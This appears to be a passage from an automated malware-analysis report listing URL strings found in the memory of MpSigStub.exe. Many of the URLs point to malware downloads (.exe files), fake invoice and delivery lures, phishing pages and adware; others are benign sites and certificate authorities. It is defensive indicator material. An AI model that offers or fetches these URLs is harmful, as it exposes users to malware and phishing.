Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://www.cashon.co.kr/app/uninstall.php?
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://www.cashon.co.kr/search/search.php
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://www.cashon.co.kr/search/search.phpx
Source: MpSigStub.exe, 00000026.00000003.18292082098.00000138BDF35000.00000004.00000001.sdmp	String found in binary or memory: http://www.ccnnic.com/download/
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	String found in binary or memory: http://www.cepdep.org/csslb/graphics/outlines/registro-cita.php
Source: MpSigStub.exe, 00000026.00000003.18317720831.00000138BDA90000.00000004.00000001.sdmp	String found in binary or memory: http://www.cert.fnmt.es/dpcs/0
Source: MpSigStub.exe, 00000026.00000003.18356361607.00000138BDCE3000.00000004.00000001.sdmp	String found in binary or memory: http://www.certum.pl/CPS0
Source: MpSigStub.exe, 00000026.00000003.18355154038.00000138BCFDB000.00000004.00000001.sdmp	String found in binary or memory: http://www.chambersign.org1
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://www.charlesboyer.it/invoice-for
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: http://www.chatzum.com/statistics/?affid=$RPT_AFFID&cztbid=$RPT_UID&inst=$RTP_SETINST&sethp=$RTP_SET
Source: MpSigStub.exe, 00000026.00000003.18331150591.00000138BD6B1000.00000004.00000001.sdmp	String found in binary or memory: http://www.cheathappens.com/trainer_troubleshooting_lite.asp
Source: MpSigStub.exe, 00000026.00000003.18331150591.00000138BD6B1000.00000004.00000001.sdmp	String found in binary or memory: http://www.cheathappens.com/unauthorized/
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://www.chipsroofingloveland.com/status/services-06-26-18-new-customer-vh/
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	String found in binary or memory: http://www.chmeditor.com/
Source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp	String found in binary or memory: http://www.ckplayer.comutf-8
Source: MpSigStub.exe, 00000026.00000003.18299675099.00000138BE03D000.00000004.00000001.sdmp	String found in binary or memory: http://www.cleveradds.com/
Source: MpSigStub.exe, 00000026.00000003.18306892097.00000138BD524000.00000004.00000001.sdmp	String found in binary or memory: http://www.clubnoega.com/_notes/arquivo1.exe
Source: MpSigStub.exe, 00000026.00000003.18306892097.00000138BD524000.00000004.00000001.sdmp	String found in binary or memory: http://www.clubnoega.com/_notes/arquivo2.exe
Source: MpSigStub.exe, 00000026.00000003.18306892097.00000138BD524000.00000004.00000001.sdmp	String found in binary or memory: http://www.clubnoega.com/_notes/arquivo3.exe
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: http://www.cmbchina.com/
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: http://www.cmfu.com/
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://www.cnn.com
Source: MpSigStub.exe, 00000026.00000003.18354806789.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://www.coapr13south.com/download.php?
Source: MpSigStub.exe, 00000026.00000003.18354806789.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://www.coapr13south.com/download.php?xe
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: http://www.codylindley.com)
Source: MpSigStub.exe, 00000026.00000003.18354806789.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://www.cojulyfastdl.com/download.php?
Source: MpSigStub.exe, 00000026.00000003.18354806789.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://www.cojulyfastdl.com/download.php?x
Source: MpSigStub.exe, 00000026.00000003.18354806789.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://www.cojune13coast.com/download.php?
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://www.colegioarbitrosargentinos.com.ar/img/overdue-account/invoice-053541/
Source: MpSigStub.exe, 00000026.00000003.18354806789.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://www.comar13west.com/download.php?
Source: MpSigStub.exe, 00000026.00000003.18354806789.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://www.comay13north.com/download.php?
Source: MpSigStub.exe, 00000026.00000003.18354806789.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://www.comay15coat.com/download.php?
Source: MpSigStub.exe, 00000026.00000003.18343624782.00000138BE12C000.00000004.00000001.sdmp	String found in binary or memory: http://www.comegoto.com/host.jpg
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://www.comeinbaby.com/app/app.php?sn=%s&pn=%s&mn=%s&pv=%s&appid=%s&os=macservice&pt=%s&msn=%
Source: MpSigStub.exe, 00000026.00000003.18349576485.00000138BE313000.00000004.00000001.sdmp	String found in binary or memory: http://www.comfm.com
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: http://www.commonname.com/find.asp?cn=
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	String found in binary or memory: http://www.constructed.fi/
Source: MpSigStub.exe, 00000026.00000003.18335030768.00000138BE917000.00000004.00000001.sdmp	String found in binary or memory: http://www.consumerinput.com/
Source: MpSigStub.exe, 00000026.00000003.18335030768.00000138BE917000.00000004.00000001.sdmp	String found in binary or memory: http://www.consumerinput.com/xb
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://www.contacto1190.com.mx/css/aa/index.php?userid=admin.sharepoint
Source: MpSigStub.exe, 00000026.00000003.18354806789.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://www.cooct13hen.com/download.php?
Source: MpSigStub.exe, 00000026.00000003.18354806789.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://www.cooctdlfast.com/download.php?
Source: MpSigStub.exe, 00000026.00000003.18354806789.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://www.cooctdlfast.com/download.php?x
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: http://www.copy9.com
Source: MpSigStub.exe, 00000026.00000003.18354806789.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://www.cosept13jetty.com/download.php?
Source: MpSigStub.exe, 00000026.00000003.18354806789.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://www.cosept14water.com/download.php?
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	String found in binary or memory: http://www.cow-shop.nl/index4.html
Source: MpSigStub.exe, 00000026.00000003.18339794865.00000138BD272000.00000004.00000001.sdmp	String found in binary or memory: http://www.ctuser.net
Source: MpSigStub.exe, 00000026.00000003.18333202472.00000138BCD05000.00000004.00000001.sdmp	String found in binary or memory: http://www.cultravel.it/invoice-number-
Source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp	String found in binary or memory: http://www.cxgr.com/codec/play/download/playmp3/
Source: MpSigStub.exe, 00000026.00000003.18299675099.00000138BE03D000.00000004.00000001.sdmp	String found in binary or memory: http://www.dandownload.com/
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: http://www.dangdang.com/
Source: MpSigStub.exe, 00000026.00000003.18314057962.00000138BE8D4000.00000004.00000001.sdmp	String found in binary or memory: http://www.darxk.com/aviatic/systema.exe
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://www.daybt.com/query.asp?q=%s
Source: MpSigStub.exe, 00000026.00000003.18331763483.00000138BE49F000.00000004.00000001.sdmp	String found in binary or memory: http://www.dealply.com/faq/
Source: MpSigStub.exe, 00000026.00000003.18312795035.00000138BEAE5000.00000004.00000001.sdmp	String found in binary or memory: http://www.default-search.net/search?sid=
Source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp	String found in binary or memory: http://www.defence.gov.au/pki0
Source: MpSigStub.exe, 00000026.00000003.18326445165.00000138BE3D9000.00000004.00000001.sdmp	String found in binary or memory: http://www.delta-homes.com/
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://www.desh-datenservice.de/ups-view/
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	String found in binary or memory: http://www.dhl.com/img/meta/dhl_logo.gif
Source: MpSigStub.exe, 00000026.00000003.18339794865.00000138BD272000.00000004.00000001.sdmp	String found in binary or memory: http://www.dialerclub.com
Source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp	String found in binary or memory: http://www.diannaowang.com:8080
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: http://www.dianping.com/
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	String found in binary or memory: http://www.diaochapai.com/survey/
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://www.digitrends.co.ke/invoice/
Source: MpSigStub.exe, 00000026.00000003.18290273099.00000138BE733000.00000004.00000001.sdmp	String found in binary or memory: http://www.direct-ip.com/
Source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp	String found in binary or memory: http://www.distance24.org/route.json?stops=
Source: MpSigStub.exe, 00000026.00000003.18335030768.00000138BE917000.00000004.00000001.sdmp	String found in binary or memory: http://www.djapp.info/?domain=xa
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: http://www.dk-soft.org
Source: MpSigStub.exe, 00000026.00000003.18322318413.00000138BD5A8000.00000004.00000001.sdmp	String found in binary or memory: http://www.dnie.es/dpc0
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: http://www.dosearches.com/?utm_source=b&utm_medium=
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: http://www.doswf.com
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://www.down988.cn/2.htm?021width=0height=0
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: http://www.dsdsd.com/
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://www.dutty.de/
Source: MpSigStub.exe, 00000026.00000003.18305972562.00000138BCED3000.00000004.00000001.sdmp	String found in binary or memory: http://www.e-jok.cn/cnfg/
Source: MpSigStub.exe, 00000026.00000003.18305972562.00000138BCED3000.00000004.00000001.sdmp	String found in binary or memory: http://www.e-jok.cn/cnfg/_poplkh
Source: MpSigStub.exe, 00000026.00000003.18305972562.00000138BCED3000.00000004.00000001.sdmp	String found in binary or memory: http://www.e-jok.cn/cnfg/canview.txt
Source: MpSigStub.exe, 00000026.00000003.18305972562.00000138BCED3000.00000004.00000001.sdmp	String found in binary or memory: http://www.e-jok.cn/cnfg/xh
Source: MpSigStub.exe, 00000026.00000003.18305972562.00000138BCED3000.00000004.00000001.sdmp	String found in binary or memory: http://www.e-jok.cn/count/updatedata.aspx?id=
Source: MpSigStub.exe, 00000026.00000003.18318003902.00000138BD399000.00000004.00000001.sdmp	String found in binary or memory: http://www.e-mirrorsite.com/exit/movies1.html__
Source: MpSigStub.exe, 00000026.00000003.18329330778.00000138BCB46000.00000004.00000001.sdmp	String found in binary or memory: http://www.e-mirrorsite.com/exit/music
Source: MpSigStub.exe, 00000026.00000003.18314933274.00000138BCB04000.00000004.00000001.sdmp	String found in binary or memory: http://www.easyspeedcheck.com/easyspeedcheck-1.php
Source: MpSigStub.exe, 00000026.00000003.18314933274.00000138BCB04000.00000004.00000001.sdmp	String found in binary or memory: http://www.easyspeedcheck.com/easyspeedcheck-1.phpx
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://www.ebay.com
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: http://www.efixpctools.com
Source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp	String found in binary or memory: http://www.egy8.com
Source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp	String found in binary or memory: http://www.egy8.comx
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://www.elitefinacing.com/finance
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://www.elitefinacing.com/service
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://www.empressdynasty.com/invoice-number-51356/
Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	String found in binary or memory: http://www.en100wan.com/google.htmwidth=0height=0
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://www.enerjisampiyonaku.com/logs/form.php
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://www.enquesta.tempsdoci.com/tracking-number-7fjs84476372436909/mar-13-18-04-02-56
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: http://www.eomniform.com/OF5/nsplugins/OFMailX.cab
Source: MpSigStub.exe, 00000026.00000003.18320722145.00000138BD946000.00000004.00000001.sdmp	String found in binary or memory: http://www.epoolsoft.com/pchunter/x
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://www.epoolstroi.ru/templates/im-start/css/fonts/canada%20post%20notice%20card.zip
Source: MpSigStub.exe, 00000026.00000003.18337502514.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://www.ewrtw.pw/c/niubilityc.exe
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: http://www.exit7.net/
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	String found in binary or memory: http://www.eyuyan.com)
Source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp	String found in binary or memory: http://www.f2ko.de
Source: MpSigStub.exe, 00000026.00000003.18331150591.00000138BD6B1000.00000004.00000001.sdmp	String found in binary or memory: http://www.facebookikiziniz.com/ext/r.php
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://www.fakhfouri.com/sales-invoice/
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://www.fastclick.com
Source: MpSigStub.exe, 00000026.00000003.18350786721.00000138BD66E000.00000004.00000001.sdmp	String found in binary or memory: http://www.fastmp3player.com
Source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp	String found in binary or memory: http://www.fastmp3player.com/affiliates/
Source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp	String found in binary or memory: http://www.fastmp3player.com/affiliates/772465/
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://www.fb.beirutmarathonculture.org/aos/aos/aos/index.htm)
Source: MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp	String found in binary or memory: http://www.fbcom.review/d/10.doc
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: http://www.fbi.gov/index.htm
Source: MpSigStub.exe, 00000026.00000003.18299675099.00000138BE03D000.00000004.00000001.sdmp	String found in binary or memory: http://www.fileden.com/files/2011/10/5/3204996/curver.txt
Source: MpSigStub.exe, 00000026.00000003.18299675099.00000138BE03D000.00000004.00000001.sdmp	String found in binary or memory: http://www.fileden.com/files/2011/10/5/3204996/curver.txtxN
Source: MpSigStub.exe, 00000026.00000003.18322318413.00000138BD5A8000.00000004.00000001.sdmp	String found in binary or memory: http://www.firmaprofesional.com/cps0
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	String found in binary or memory: http://www.fixarabul.com
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	String found in binary or memory: http://www.fixarasana.com
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: http://www.flashempire.com/
Source: MpSigStub.exe, 00000026.00000003.18292082098.00000138BDF35000.00000004.00000001.sdmp	String found in binary or memory: http://www.flashkin.net
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	String found in binary or memory: http://www.flvpro.com/?aff=
Source: MpSigStub.exe, 00000026.00000003.18292082098.00000138BDF35000.00000004.00000001.sdmp	String found in binary or memory: http://www.fopo.com.ar/thiscodewascreatedon
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://www.friend-card.com/pickup.aspx?code=
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://www.friend-greeting.net/pickup.aspx?code=
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://www.friendgreeting.com/pickup.aspx?code=
Source: MpSigStub.exe, 00000026.00000003.18348332135.00000138BE958000.00000004.00000001.sdmp	String found in binary or memory: http://www.friskypotato.com/
Source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp	String found in binary or memory: http://www.friskypotato.com/codec/mp3/activecod3
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://www.gamedanji.cn/ExeIni
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://www.general-insurance.net/wp-content/themes/general-ins-net/po
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://www.geocities.com/joke_haha2001
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://www.getpricefinder.com/
Source: MpSigStub.exe, 00000026.00000003.18354806789.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://www.getsav-in.compublisheradpeak
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	String found in binary or memory: http://www.ggt.int.pld
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://www.gistery.trade/sys/designbolts.exe
Source: MpSigStub.exe, 00000026.00000003.18318003902.00000138BD399000.00000004.00000001.sdmp	String found in binary or memory: http://www.gnu.org/licenses/
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://www.go2000.cn/p/?q=
Source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	String found in binary or memory: http://www.go2000.com/?4
Source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	String found in binary or memory: http://www.go2000.com/?4aM
Source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp	String found in binary or memory: http://www.goldentech.co.kr
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://www.goldwindos2000.com/krratwo/hker.htm
Source: MpSigStub.exe, 00000026.00000003.18304476785.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://www.google.cn/search?hl=zh-CN&q=
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://www.google.cn/search?q=%s
Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	String found in binary or memory: http://www.google.com
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: http://www.google.com.tr/
Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	String found in binary or memory: http://www.google.com/search?complete=1&q=%s
Source: MpSigStub.exe, 00000026.00000003.18268996153.00000138AEB7A000.00000004.00000001.sdmp	String found in binary or memory: http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web
Source: MpSigStub.exe, 00000026.00000003.18268996153.00000138AEB7A000.00000004.00000001.sdmp	String found in binary or memory: http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=webreferrerMicrosoft
Source: MpSigStub.exe, 00000026.00000003.18252515965.00000138ADB0C000.00000004.00000001.sdmp	String found in binary or memory: http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=webreferrercookienode.appendChild()
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://www.gooo.ru
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://www.gorillawalker.com
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://www.gratisweb.com/vaisefuder00
Source: MpSigStub.exe, 00000026.00000003.18344712542.00000138BD9CA000.00000004.00000001.sdmp	String found in binary or memory: http://www.greenpartnership.jp
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://www.greyhathacker.net/tools/
Source: MpSigStub.exe, 00000026.00000003.18322318413.00000138BD5A8000.00000004.00000001.sdmp	String found in binary or memory: http://www.guzzotorino.it/ups-ship-notification
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: http://www.hao123.com/
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: http://www.hao123.com/?tn=
Source: MpSigStub.exe, 00000026.00000003.18331763483.00000138BE49F000.00000004.00000001.sdmp	String found in binary or memory: http://www.haosoft.net/
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://www.hasandanalioglu.com/wp-content/n_v/
Source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp	String found in binary or memory: http://www.hebogo.com/ac
Source: MpSigStub.exe, 00000026.00000003.18326492976.00000138BE3E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.hjsdffsfs.aonecommercial.com
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: http://www.hljcm.com/c
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://www.hoarafushionline.net/extractf.php?x=
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://www.hoarafushionline.net/habeys.exe
Source: MpSigStub.exe, 00000026.00000003.18302973741.00000138BE4E1000.00000004.00000001.sdmp	String found in binary or memory: http://www.hohosearch.com/?ts=
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: http://www.hotbar.com
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: http://www.hotdutchporn.net/cb/scripts/getAddressFromIP.php?wmid=
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: http://www.htylk.esy.es/nobe/downloaddocument-adobesignin.html
Source: MpSigStub.exe, 00000026.00000003.18348616803.00000138BCC0C000.00000004.00000001.sdmp	String found in binary or memory: http://www.hustler-exclusive.com/
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	String found in binary or memory: http://www.hxlive.cn
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: http://www.i-cash.de/
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://www.iask.com/s?k=%s
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://www.ica.co.il/repository/cps/PersonalID_Practice_Statement.pdf0
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: http://www.icbc.com.cn/
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://www.iciba.com/search?s=%s
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://www.icq.com
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://www.icservic.com/proxy/proxy.pac?id=moteur2
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://www.idownline.com/members/idownline
Source: MpSigStub.exe, 00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp	String found in binary or memory: http://www.ilikeclick.com/track/click.php?dts_code=
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: http://www.imobile.com.cn/
Source: MpSigStub.exe, 00000026.00000003.18295324067.00000138BE20A000.00000004.00000001.sdmp	String found in binary or memory: http://www.inet4you.com/exit/
Source: MpSigStub.exe, 00000026.00000003.18321039197.00000138BD98C000.00000004.00000001.sdmp	String found in binary or memory: http://www.infoaxe.com/enhancedsearchform.jsp
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://www.infoodesk.org/wizzy/wizzy/mailmine.html)
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	String found in binary or memory: http://www.infotraffik-01.space/?
Source: MpSigStub.exe, 00000026.00000003.18354806789.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://www.installmonetizer.com/download.php?
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://www.ip.com.cn/idcard.php?q=%s
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://www.ip.com.cn/ip.php?q=%s
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://www.ip.com.cn/mobile.php?q=%s
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://www.ip.com.cn/tel.php?q=%s
Source: MpSigStub.exe, 00000026.00000003.18303628807.00000138BE85F000.00000004.00000001.sdmp	String found in binary or memory: http://www.ip2location.com/
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	String found in binary or memory: http://www.ipvoips.com/
Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	String found in binary or memory: http://www.ischrome.com/
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://www.isihodiernatunisi.com/online/zixmessage.htm)
Source: MpSigStub.exe, 00000026.00000003.18348911082.00000138BD189000.00000004.00000001.sdmp	String found in binary or memory: http://www.istartsurf.com
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	String found in binary or memory: http://www.itau.com.br
Source: MpSigStub.exe, 00000026.00000003.18297877287.00000138BE565000.00000004.00000001.sdmp	String found in binary or memory: http://www.j.mp/
Source: MpSigStub.exe, 00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp	String found in binary or memory: http://www.jafiduto.cz/images/wordpress.php
